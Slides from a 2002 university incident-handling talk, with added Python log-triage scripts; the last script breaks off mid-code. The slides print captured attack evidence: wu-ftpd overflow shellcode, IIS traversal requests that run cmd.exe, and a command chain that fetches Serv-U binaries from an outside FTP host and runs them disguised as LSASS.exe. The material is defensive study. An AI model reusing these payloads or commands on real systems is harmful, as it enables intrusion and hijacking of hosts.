Adventures in incident handling
Adventures In Incident Handling. Paul Asadoorian, GCIA Brown University August 16, 2002 MIT Security Camp. Outline. Incident Handling @ Brown University Incident Discovery Processes Containing the damage Analyzing the results Recovery Learning from the experiences.


Adventures In Incident Handling

Paul Asadoorian, GCIA

Brown University

August 16, 2002

MIT Security Camp


Outline

  • Incident Handling @ Brown University

  • Incident Discovery Processes

  • Containing the damage

  • Analyzing the results

  • Recovery

  • Learning from the experiences

Paul Asadoorian, Brown University CIRT


The Brown University CIRT

  • CIRT (Computer Incident Response Team)

  • Formed in Mid-December 2001

  • Consists of members of technical teams and management within the computing and information services department

The Brown University CIRT

  • Identify categories of malicious activity threatening Brown University's computing and information services.

  • Coordinate appropriate responses to counter malicious threats

  • Codify group level response procedures so that there is archival documentation and understanding of roles across CIS groups

The Brown University CIRT

  • Review and recommend appropriate new policy or updates to existing policies to CIS management

  • Be aware of developing security issues affecting computing and information services

  • Work with the Help Desk and Computer Education to raise users' awareness of computing best practices and security issues

The Brown University CIRT

  • Respond to Incidents using the six step process:

    • Preparation

    • Identification

    • Containment

    • Eradication

    • Recovery

    • Lessons Learned

  • Primary Incident Handlers:

    • Paul Asadoorian

    • Suzanne Coski

CIRT - Authorization

  • Get permission

  • Security Assessment and Audit Authorization:

    • “When requested, any access required for the purpose of performing an audit or responding to a computer security incident will be provided to members of Brown University's Information Security team.”

  • Also permits use of “legitimate” security auditing tools

CIRT – Remedy Form

CIRT – Jump Bag

  • Laptop with appropriate software

  • Networking hub and cables

  • Cell phone

  • Campus phone directory

  • Linux/windows boot disks

  • Operating System CDs

  • Tape/Disk/CDRW backup media

Local Contacts

  • Strengthened Brown’s Systems Administrators group

  • Monthly meetings and newsletters

  • Email: SysAdmins@brown.edu

  • Web: http://www.brown.edu/Research/SysAdmins/

Contacting CIRT

  • Email:

    CIRT@brown.edu

  • Web:

    http://www.brown.edu/Facilities/CIS/CIRT/

Incident Discovery

  • Intrusion Detection System

  • Logs (Firewall, Systems, Routers)

  • 3rd Party

  • Panicking Systems Administrators

Incident Discovery: IDS

  • Currently monitoring all incoming and outgoing Internet and Internet2 traffic

  • Spikes up to 300mb/s

  • Does not catch attacks that occur on campus only

Incident Discovery: IDS

  • Snort (www.snort.org)

  • TopLayer Networks IDS Load Balancer (www.toplayer.com)

  • MySQL, ACID, Apache, SSH

    • SSH for rule management

Incident Discovery: IDS

#(1 - 2420) [2002-07-02 11:52:25] [arachNIDS/287] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow

IPv4: 203.184.173.249 -> MY.SUB.NET.8 hlen=5 TOS=48 dlen=350 ID=7510 flags=0 offset=0 TTL=46 chksum=8390

TCP: port=36269 -> dport: 21 flags=***AP*** seq=2161363806 ack=3044544837 off=5 res=0 win=5840 urp=0 chksum=65114 Payload: length = 301

000 : 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........

010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................

090 : 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 ....1.1.1..F..1.

0a0 : 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 1.C..A.?...k^1.1

0b0 : C9 8D 5E 01 88 46 04 66 B9 B0 27 CD 80 31 C0 8D ..^..F.f..'..1..

0c0 : 5E 01 B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 ^..=..1.1..^..C.

0d0 : 31 C9 FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 1...1..^.......u

0e0 : F3 31 C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 .1..F..^..=.....

0f0 : 30 FE C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0...F.1..F..v..F

100 : 0C 89 F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 ....N..V.....1.1

110 : DB B0 01 CD 80 E8 90 30 62 69 6E 30 73 68 31 2E .......0bin0sh1.

120 : 2E 31 31 40 61 6F 6C 2E 63 6F 6D 0D 0A .11@aol.com..
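An alert like the one above is what a handler triages by hand: a PASS argument that is almost entirely 0x90 bytes is the signature of a stack overflow attempt, not a password. The following added example (not from the talk) parses an ACID-style alert dump of this shape, rebuilds the payload from the hex columns, and flags a long NOP run. The sample is the slide's alert trimmed to four payload rows (with the declared length adjusted to match); the 32-byte sled threshold is an arbitrary choice.

```python
import re
from typing import Optional, Tuple

# Constructed sample: the alert on this slide, trimmed to four payload rows
# (the declared payload length is set to 64 to match the rows kept).
SAMPLE_ALERT = """\
#(1 - 2420) [2002-07-02 11:52:25] [arachNIDS/287] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow
IPv4: 203.184.173.249 -> MY.SUB.NET.8 hlen=5 TOS=48 dlen=350 ID=7510 flags=0 offset=0 TTL=46 chksum=8390
TCP: port=36269 -> dport: 21 flags=***AP*** seq=2161363806 ack=3044544837 off=5 res=0 win=5840 urp=0 chksum=65114 Payload: length = 64
000 : 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........
010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
030 : 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 ....1.1.1..F..1.
"""

SIG_LINE = re.compile(r"^#\(\d+ - \d+\) \[([^\]]+)\] (.*)$")
ADDR_LINE = re.compile(r"IPv4: (\S+) -> (\S+)")
PAYLOAD_LEN = re.compile(r"Payload: length = (\d+)")
HEX_ROW = re.compile(r"^[0-9A-Fa-f]{3} : (.*)$")
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
NOP = 0x90


def parse_acid_alert(text: str) -> dict:
    """Header fields plus the raw payload bytes, rebuilt from an ACID text dump."""
    alert = {"timestamp": "", "signature": "", "src": "", "dst": ""}
    expected: Optional[int] = None
    raw = bytearray()
    for line in text.splitlines():
        line = line.strip()
        m = SIG_LINE.match(line)
        if m:  # drop reference tags such as "[arachNIDS/287]" before the message
            alert["timestamp"] = m.group(1)
            alert["signature"] = re.sub(r"^(\[[^\]]+\] )+", "", m.group(2))
            continue
        m = ADDR_LINE.search(line)
        if m:
            alert["src"], alert["dst"] = m.group(1), m.group(2)
        m = PAYLOAD_LEN.search(line)
        if m:
            expected = int(m.group(1))
        m = HEX_ROW.match(line)
        if m:
            # Hex columns come first; the ASCII rendering at the end of the row is
            # never a two-hex-digit token, and the declared length caps the total.
            for tok in m.group(1).split():
                if not HEX_BYTE.match(tok) or (expected is not None and len(raw) >= expected):
                    break
                raw.append(int(tok, 16))
    alert["payload"] = bytes(raw)
    return alert


def longest_nop_run(payload: bytes) -> Tuple[int, int]:
    """Length and start offset of the longest run of 0x90 bytes."""
    best_len = best_start = cur_len = cur_start = 0
    for i, b in enumerate(payload):
        if b != NOP:
            cur_len = 0
            continue
        if cur_len == 0:
            cur_start = i
        cur_len += 1
        if cur_len > best_len:
            best_len, best_start = cur_len, cur_start
    return best_len, best_start


def triage(text: str, sled_threshold: int = 32) -> dict:
    """Summarise the alert; likely_sled is True once a NOP run reaches the threshold."""
    alert = parse_acid_alert(text)
    run, start = longest_nop_run(alert["payload"])
    verb = alert["payload"].split(b" ", 1)[0]  # FTP verb: printable text before first space
    return {
        "signature": alert["signature"],
        "src": alert["src"],
        "dst": alert["dst"],
        "ftp_verb": verb.decode("ascii") if verb.isalpha() else "",
        "payload_len": len(alert["payload"]),
        "nop_run": run,
        "nop_start": start,
        "likely_sled": run >= sled_threshold,
    }
```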


Incident Discovery: IDS

#(5 - 51010) [2002-07-22 14:23:36] ATTACK RESPONSES id check returned root

IPv4: MY.SUB.NET.126 -> 202.100.254.163 hlen=5 TOS=0 dlen=76 ID=53672 flags=0 offset=0 TTL=63 chksum=58344

TCP: port=22 -> dport: 1060 flags=***AP*** seq=306540118 ack=513337267 off=8 res=0 win=31856 urp=0 chksum=64269

Options:

#1 - NOP len=0

#2 - NOP len=0

#3 - TS len=10 data=074F58920054721D

Payload: length = 24

000 : 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid=

010 : 30 28 72 6F 6F 74 29 0A 0(root).

Incident Discovery: IDS

Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 202.100.254.163:1040 -> MY.SUB.NET.126:22

<Repeats 9 more times>

Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} MY.SUB.NET.126:22 -> 202.100.254.163:1060

Incident Discovery: Firewall Logs

  • Firewall protects our critical infrastructure

  • Isolated Subnet with no machines

  • Simply logs any traffic going to this subnet

    • Approx 90,000 packets logged per month

Incident Discovery: Firewall Logs

Jul 24 00:14:57 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:13" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Jul 24 00:14:59 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:16" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Aug 5 09:01:38 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:41" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Aug 5 09:01:40 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:44" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Incident Discovery: System Logs

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [100]USER, user1,,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 204, 0, 0, 530, 1326, [100]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 141, 0, 0, 530, 1326, [101]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 15, 0, 0, 331, 0, [100]USER, user1, -,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [100]PASS, -, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,-,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [102]USER, user1, -,

216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [103]USER, user1, -,

216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [101]PASS, -, -,
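The records above are four parallel connections from one client, all trying user1 inside a single second. The following added example (not from the talk) parses this comma-separated IIS FTP log format, in which the connection id sits in brackets in front of the FTP verb, and reports a client once its PASS attempts answered 530 reach a threshold within a time window. The sample records are the slide's, re-joined onto one line each; the 60-second window and threshold of 3 are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: the FTP log records from this slide, one record per line.
FTP_LOG = """\
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [100]USER, user1,,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 204, 0, 0, 530, 1326, [100]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 141, 0, 0, 530, 1326, [101]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 15, 0, 0, 331, 0, [100]USER, user1, -,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [100]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,-,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [102]USER, user1, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [103]USER, user1, -,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [101]PASS, -, -,
"""

# Field order of the comma-separated IIS log format as written by the FTP service (MSFTPSVC)
FIELDS = ["c_ip", "cs_username", "date", "time", "s_sitename", "s_computername", "s_ip",
          "time_taken", "sc_bytes", "cs_bytes", "sc_status", "sc_win32_status",
          "cs_method", "cs_uri_stem", "cs_uri_query"]
METHOD = re.compile(r"^\[(\d+)\](\w+)$")  # "[100]PASS" -> connection 100, verb PASS


def parse_msftp_log(text: str) -> List[dict]:
    """One dict per record, with the connection id, FTP verb and a datetime added."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        rec = dict(zip(FIELDS, (p.strip() for p in line.split(","))))
        m = METHOD.match(rec.get("cs_method", ""))
        if len(rec) < len(FIELDS) or not m:
            continue
        rec["conn"], rec["verb"] = m.group(1), m.group(2)
        rec["when"] = datetime.strptime(rec["date"] + " " + rec["time"], "%m/%d/%y %H:%M:%S")
        rec["sc_status"] = int(rec["sc_status"])
        records.append(rec)
    return records


def failed_login_bursts(records: List[dict], window: timedelta = timedelta(seconds=60),
                        threshold: int = 3) -> Dict[str, dict]:
    """Clients whose PASS attempts answered 530 (not logged in) reach `threshold`
    inside any `window` of time; also reports how many parallel connections and
    which account names the client used, to support the lockout/reset decision."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    conns: Dict[str, set] = defaultdict(set)
    users: Dict[str, set] = defaultdict(set)
    for r in records:
        conns[r["c_ip"]].add(r["conn"])
        if r["verb"] == "USER":
            users[r["c_ip"]].add(r["cs_uri_stem"])
        elif r["verb"] == "PASS" and r["sc_status"] == 530:
            failures[r["c_ip"]].append(r["when"])
    report = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                report[ip] = {"failures": len(times), "connections": len(conns[ip]),
                              "usernames": sorted(users[ip])}
                break
    return report
```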

Incident Discovery: System Logs

3/6/02 6:14:45 PM Security Failure Audit Logon/Logoff 539

NT AUTHORITY\SYSTEM <System Name>

Logon Failure:

Reason: Account locked out

User Name: ftptest

Domain: WIN07147

Logon Type: 3

Logon Process: KSecDD

Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0

Workstation Name: \\WIN07147

Incident Discovery: System Logs

2002-03-24 21:13:08 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502

2002-03-24 21:13:11 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nltestsite>>c:\config.txt 502

2002-03-24 21:13:13 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nolimit>>c:\config.txt 502

2002-03-24 21:13:18 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\config.txt 502
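The talk reconstructs by hand what these requests made the server run. The following added example (not from the talk) does the same mechanically for IIS W3C log lines of this shape: it decodes the URI stem (so %5c becomes a backslash and the `..\..` traversal is visible), flags requests whose resolved path leaves the /scripts virtual directory, and URL-decodes the `/c+...` query into the command line cmd.exe was handed. The sample is the slide's four requests re-joined onto single lines plus one constructed benign request from 10.0.0.5.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote, unquote_plus

# Constructed sample: the four requests from this slide on single lines, plus one
# benign request (client 10.0.0.5, made up) for contrast.
IIS_LOG = r"""
2002-03-24 21:13:08 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502
2002-03-24 21:13:11 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nltestsite>>c:\config.txt 502
2002-03-24 21:13:13 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nolimit>>c:\config.txt 502
2002-03-24 21:13:18 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\config.txt 502
2002-03-24 21:14:02 10.0.0.5 - MY.SUB.NET.233 80 GET /scripts/status.asp - 200
"""

# Fields in the order they appear in these lines (W3C extended format as configured here)
FIELDS = ["date", "time", "c_ip", "cs_username", "s_ip", "s_port",
          "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status"]


def parse_iis_w3c(text: str) -> List[dict]:
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < len(FIELDS) or line.startswith("#"):
            continue
        records.append(dict(zip(FIELDS, parts)))
    return records


def decoded_path(stem: str) -> str:
    """Decode %xx twice so a doubly encoded %255c is also seen as a backslash (one
    pass is enough for this log), then treat backslashes as path separators."""
    return unquote(unquote(stem)).replace("\\", "/")


def escapes_vdir(stem: str, vdir: str = "/scripts") -> bool:
    """True when the request's resolved path is no longer under the virtual directory."""
    resolved = posixpath.normpath(decoded_path(stem))
    return not resolved.startswith(vdir + "/")


def command_from_query(query: str) -> Optional[str]:
    """The command line passed to cmd.exe via '/c+...', or None if not that shape."""
    decoded = unquote_plus(query)
    if decoded.lower().startswith("/c "):
        return decoded[3:].strip()
    return None


def reconstruct_commands(text: str) -> List[Tuple[str, str, str]]:
    """(time, client ip, command) for each traversal request that handed cmd.exe a command."""
    out = []
    for r in parse_iis_w3c(text):
        if not escapes_vdir(r["cs_uri_stem"]):
            continue
        cmd = command_from_query(r["cs_uri_query"])
        if cmd is not None:
            out.append((r["time"], r["c_ip"], cmd))
    return out
```

Every request in the sample got a 502, so the status column alone says nothing about whether the command ran; the reconstructed command list is what the next slide shows.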


copy c:\winnt\system32\cmd.exe c:\command.exe

Echo nltestsite>>c:\config.txt

Echo nolimit>>c:\config.txt

Echo get /secret/ServUDaemon.ini c:\test.ini>>c:\config.txt

Echo get /secret/dirchange.tx c:\dirchange.txt>>c:\config.txt

Echo binary>>c:\config.txt

Echo get /secret/ServUDaemon.exe c:\test.exe>>c:\config.txt

Echo bye>>c:\config.txt

ftp.exe -s:c:\config.txt nltestsite.hypermart.net

Mkdir c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501

Copy c:\test.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe

Copy c:\test.ini c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll

Copy c:\dirchange.txt c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\system32.dll

del+c:\test.ini

del+c:\test.exe

del+c:\config.txt

dir+c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501

del+c:\config.txt

del+c:\config.txt

c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll

Incident Discovery: Router Logs

Jul 30 17:49:19 router.mydomain.edu 10124: Jul 30 16:49:18: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 193.0.0.11 (0/0), 2 packets

Jul 30 18:51:22 router.mydomain.edu 10173: Jul 30 17:51:21: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 1 packet

Jul 30 18:52:37 router.mydomain.edu 10176: Jul 30 17:52:36: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 1 packet

Jul 30 18:55:32 router.mydomain.edu 10179: Jul 30 17:55:31: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 128.8.7.4 (0/0), 1 packet

Jul 30 18:57:21 router.mydomain.edu 10181: Jul 30 17:57:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 5 packets

Jul 30 18:58:21 router.mydomain.edu 10182: Jul 30 17:58:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 2 packets

Incident Discovery: 3rd party

You are receiving this notice since your address is listed as the contact in the ARIN database for IP address MY.SUB.NET.79. The following Nimda Worm intrusion attempt was made against SOMEONEELSESDOMAIN.COM.

DATE/TIME: Aug-13-2002 (05:52:00) [UTC]

SOURCE   : MY.SUB.NET.79

DEST     : 172.213.167.32

ATTEMPT  : /scripts/root.exe?/c+dir

Please advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems. Thank you for your prompt attention to this matter.

-Early Bird v2.6 (http://www.treachery.net/earlybird/)

Incident Discovery: Panicking Systems Administrator

  • I “Think” I’ve been hacked

  • I’ve been hacked, help!

  • I was hacked, didn’t I tell you?


(ASCII-art "X-ORG" banner)

you can stop one, but you can NOT stop all of us!

-------### Powered By X-ORG ###-------

-------### ToRn, Danny-Boy, Apache ###-------

-------### Dimfate, Angelz, Annihilat ###-------

-------### JNX, _random, Beast ###-------

-------### W_Knight, Markland ###-------

-------### |mojo69| ###-------

Dear System Admin,

Your system was recently compromised by X-ORG.. We patched the security hole used to compromise your system, Please note, no data on your system was stolen or damaged in any shape of form, nor was this ever our intention. We simply installed some backdoors to permit us to access to the system again.

If you would like to contact us regarding any security issues or even simply for a chat, please email.. XORG@mailroom.com or you can find us on #etcpub @ IRCnet.

X-Organisation.

"IN THE NAME OF BEXTER!"

- EOF -

X-Org SunOS Rootkit v2.5DXE - By JudgeD/Danny-Boy

Containing the damage

  • Filter from the network on local router

  • Prefer port disabling on switch

  • Tracking and clean-up

    • Hey I got a new address and I can’t get to the Internet?

Analyzing the results: Windows

bash-2.05# nmap -p1-65535 MY.SUB.NET.144

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on host.domain.myuniv.edu (MY.SUB.NET.144):

(The 65529 ports scanned but not shown below are in state: closed)

Port State Service

135/tcp open loc-srv

139/tcp open netbios-ssn

1029/tcp open ms-lsa

1031/tcp open iad2

6129/tcp open unknown

7614/tcp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 31 seconds

Analyzing the results: Windows

  • Connect to ports and see what’s interesting:

    bash-2.05# nc MY.SUB.NET.144 7614

    "Wollf Remote Manager" v1.4

    Code by wollf, http://www.xfocus.org

    [500105@C:\WINNT\system32]#

Analyzing the Results: Windows

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting ports on host.mydomain.edu (MY.SUB.NET.84):

(The 65528 ports scanned but not shown below are in state: closed)

Port State Service

113/tcp open auth

135/tcp open loc-srv

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1027/tcp open IIS

1517/tcp open vpac

57970/tcp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 65 seconds

Analyzing the Results: Windows

bash-2.05# nc MY.SUB.NET.84 57970

220-Serv-U FTP Server v3.0 for WinSock ready...

220-

220--Server Stats

220-Uptime: 5 days 15 hours 4 mins

220-Files downloaded: 76 Total: 952044 Kb

220-Files uploaded: 326 Total: 7621646 Kb

220-Current Speed: 0.000 Kb/sec

220-Average Speed: 17.632 Kb/sec

220-

220--User Stats

220-Users logged in: 1 / -1

220-Total logged in users: 61

220-Users in last 24hrs: 7

220-

220-################################

Analyzing the Results: Windows

  • What we find:

    • LSASS.exe

    • ispc.exe

    • system32.dll

    • SERVICES.EXE

    • nc.exe

    • xdcc

    • ServUStartUpLog.txt

    • servudaemon.ini

    • xdcc.bat

    • Slave.exe

    • srvany.exe

Analyzing the Results: Windows

  • ServU-FTP Server

  • IROffer – IRC BOT to distribute files

  • Fire Daemon – Run any program as a service

Analyzing the Results: Windows

  • Hiding in the trash:

    @echo off

    c:

    cd\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\xdcc

    iroffer.exe my.config

Analyzing the Results: Windows

  • Movies

  • Video Games

  • Software

  • Adult Material

Analyzing the Results: Windows

  • How they get in:

    • NetBIOS Null Sessions

    • Blank or weak Administrator passwords

    • Unpatched IIS Servers

Analyzing the Results: Unix

Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.244:1332 -> 195.210.91.83:1

Jun 16 16:51:27 tsali snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.23:1702 -> 195.210.91.83:4

Jun 16 12:08:42 mtsnow snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.54:1853 -> 195.210.91.83:3

Jun 16 12:18:25 vail snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.75:1639 -> 195.210.91.83:10113

Jun 16 16:51:27 durango snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.68:1893 -> 195.210.91.83:5
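Both of the Snort syslog slides in this deck (the SSH CRC32 exploit answered by "id check returned root" from the target, and the five campus hosts SYN-flooding one destination above) can be turned into automatic escalations. The following added example (not from the talk) parses Snort's syslog line format and applies two rules: an EXPLOIT alert toward a host paired with a root-response alert from that same host to the same peer is reported as a likely compromise, and a DDOS signature from several internal sources to one destination is reported as a set of hosts to contain. The sample lines are the ones shown on the two slides, re-joined onto single lines; the minimum of three sources is an assumption.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample: the Snort syslog lines from these slides, one alert per line.
SNORT_LOG = """\
Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 202.100.254.163:1040 -> MY.SUB.NET.126:22
Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} MY.SUB.NET.126:22 -> 202.100.254.163:1060
Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.244:1332 -> 195.210.91.83:1
Jun 16 16:51:27 tsali snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.23:1702 -> 195.210.91.83:4
Jun 16 12:08:42 mtsnow snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.54:1853 -> 195.210.91.83:3
Jun 16 12:18:25 vail snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.75:1639 -> 195.210.91.83:10113
Jun 16 16:51:27 durango snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.68:1893 -> 195.210.91.83:5
"""

SNORT_LINE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<sensor>\S+) snort: "
    r"\[(?P<sid>\d+:\d+:\d+)\] (?P<msg>.*?) "
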